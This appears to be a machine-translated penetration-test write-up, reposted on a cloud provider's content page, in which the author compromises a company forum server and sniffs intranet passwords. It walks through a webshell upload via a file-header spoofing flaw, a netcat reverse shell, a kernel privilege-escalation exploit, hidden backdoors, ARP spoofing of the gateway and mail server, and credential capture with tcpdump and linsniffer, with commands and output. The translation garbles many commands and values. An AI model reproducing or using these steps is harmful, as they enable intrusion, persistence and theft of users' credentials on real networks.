Linux ARP spoofing sniffing internal penetration test

Source: Internet
Author: User

Linux ARP spoofing sniffing internal penetration test

I have already told the related personnel that the smtp and pop protocols for mailbox authentication should be encrypted. Otherwise, it is too easy for someone to sniffer the plaintext password in the company's intranet. In addition, the mailbox password is shared with bbs, bbs also uses the http protocol and does not use https, which is a problem. Although the network we control has been processed, the ip address is bound to the mac address. Even if someone spoofs the ip address, the network cannot reach the Gateway after the spoofing, unless it does not go out of the gateway, therefore, it is impossible to sniff the plaintext mailbox password (because the mailbox server is not in the same network segment ). However, for some of our shared resources, the server has a public ip address and an Intranet ip address, which is at a relatively high risk and does not have a network environment with corresponding security policies based on the security level, therefore, some problems are obvious, but some people are not at all. So I conducted a simple internal penetration test.

First, I start with a network segment with a public ip address and an Intranet ip address. For example, the Public ip segment is 222.222.222.0/255.255.255.255.255, and the Intranet ip segment is 192.168.0.0/255.255.255.0.

We found that a php forum of an old version was run on 222.222.222.77 (192.168.0.77. After detection, the upload vulnerability exists and the gif89a File Header Spoofing Vulnerability is used to upload a webshell. Then upload an nst.
1:



Use the bounce connection in tools:
First, use nc-l-p 5546 to listen to the port locally.
4:


Click Back connect on the nst.
2: (pay attention to the red part)



Login successful
3:


Figure 5:


In the local nc window:
Id
Uid = 99 (nobody) gid = 99 (nobody) groups = 99 (nobody)
The permission is low. You can exploit the local privilege escalation vulnerability of the Linux kernel vmsplice some time ago. First upload the Code with nst:
6: (pay attention to the red part. The upload is successful)


Return to the nc window:
Cp in. c/tmp

Cd/tmp

Ls
In. c
Nst_c_bc_c.c
Sess_af927ee319af5d5417b61ac520e53fcf
Ssh-ZeOfP16753
Tunl0

Gcc-o in. c

Ls
In
In. c
Nst_c_bc_c.c
Sess_af927ee319af5d5417b61ac520e53fcf
Ssh-ZeOfP16753
Tunl0

/Tmp/in
Bash: no job control in this shell
[Root @ bbs111 tmp] # id
Uid = 0 (root) gid = 0 (root) groups = 99 (nobody)
[Root @ bbs111 tmp] #

It is already the root permission. Next I will upload the frequently used Backdoors that I have modified. This article has previously written about how to keep backdoors. I will not describe it here (replace sshd and some commands, can hide ports, connections, files, processes, etc ).

Clean pp and focus on the next step.

We still directly use the backdoor sshd to log on. Or ssh :)
7:


Use the rz command in SecureCRT to upload the arpsnifer. c we use, and then compile:

[Root @ bbs111 root] # gcc-I/usr/local/include-L/usr/local/lib-o arpsnifer. c-lpcap-lnet

The error message may be because libnet is not installed. Check the description: Make: first you must install "pcap" and "libnet" to confirm that pcap and libnet must be installed in arpsnifer. c.

[Root @ bbs111 root] # rpm-ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[Root @ bbs111 root] # wgetHttp://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz? Modtime= 1072656000& Amp; big_mirror = 0
[Root @ bbs111 root] # tar zxvf libpcap-0.8.1.tar.gz
[Root @ bbs111 root] # cd libpcap-0.8.1
[Root @ bbs111 libpcap-0.8.1] #./configure
[Root @ bbs111 libpcap-0.8.1] # make
[Root @ bbs111 libpcap-0.8.1] # make install

The preparation is OK. Recompile arpsnifer. c.

[Root @ bbs111 root] # gcc-I/usr/local/include-L/usr/local/lib-o arpsnifer. c-lpcap-lnet

No error is reported this time. The compilation is successful.

[Root @ bbs111 root] #./arpsnifer
==========================================
============= Arp Sniffer ====================
=========== Write by Paris-Ye ============
=== Usage:./arpsniffer-I [interface]-M [Self IP]-W [Workstation IP]-S [Server IP]-P [port]
=== For example:
./Arpsniffer-I eth0-M 192.168.0.6-W 192.168.0.4-S 192.168.0.254

Here we start to cheat, because it is the server side, so we cheat the Gateway: (the network environment is as follows, Mail Server ip: 192.168.0.11 Gateway: 192.168.0.1 Local Machine: 192.168.0.77)

[Root @ bbs111 root] #./arpsnifer-I eth0-M 192.168.0.77-W 192.168.0.1-S 192.168.0.11-P 110
110
110
Get network cards mac address:
M-> 00: 0e: a6: a5: 80: 4f
W-> 00: 0f: e2: 23: 05: d0
S-> 00: d0: b7: 88: 07: 59

Now Start ......

Use tcpdump to monitor another Logon:

[Root @ bbs111 root] # tcpdump-I eth0 host 192.168.0.11

If data is found, store the monitored data in the file:

[Root @ bbs111 root] # tcpdump-I eth0 host 172.16.0.12-w pop.txt

Stop at 10 minutes later. Use the szcommand to download pop.txt to the local directory under securecrt, and then use Ethereal for analysis. The plaintext user name and password are found.

Next we can use linsniffer to listen to the user name and password we want.
First modify linsniffer. c: Listen to the corresponding application password as needed. Mine is as follows:

If (ntohs (tcp-> dest) = 21) p = 1;/* ftp */
If (ntohs (tcp-> dest) = 22) p = 1;/* ssh for comparison added for example only comment out if desired */
If (ntohs (tcp-> dest) = 23) p = 1;/* telnet */
If (ntohs (tcp-> dest) = 80) p = 1;/* http */
If (ntohs (tcp-> dest) = 110) p = 1;/* pop3 */
If (ntohs (tcp-> dest) = 513) p = 1;/* rlogin */
If (ntohs (tcp-> dest) = 106) p = 1;/* poppasswd */

[Root @ bbs111 root] # gcc-o linsniffer. c
In file encoded ded from/usr/include/linux/tcp. h: 21,
From linsniffer. c: 32:
/Usr/include/asm/byteorder. h: 6: 2: warning: # warning using private kernel header; include <endian. h> instead!

Run the compiled linsniffer directly without warning.

[Root @ bbs111 root] #./linsniffer

The user name and password are automatically stored in tcp. log. 8:


After the test, we sent the user name and password of someone to someone. I believe he will not take it for granted that sniffer is impossible. Next, we will use the password we sniffed to create a password table for a new round of further Intranet penetration tests. We believe that our network security will be greatly improved after we carry out the security technical transformation and security management standardization system transformation based on the penetration test results.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.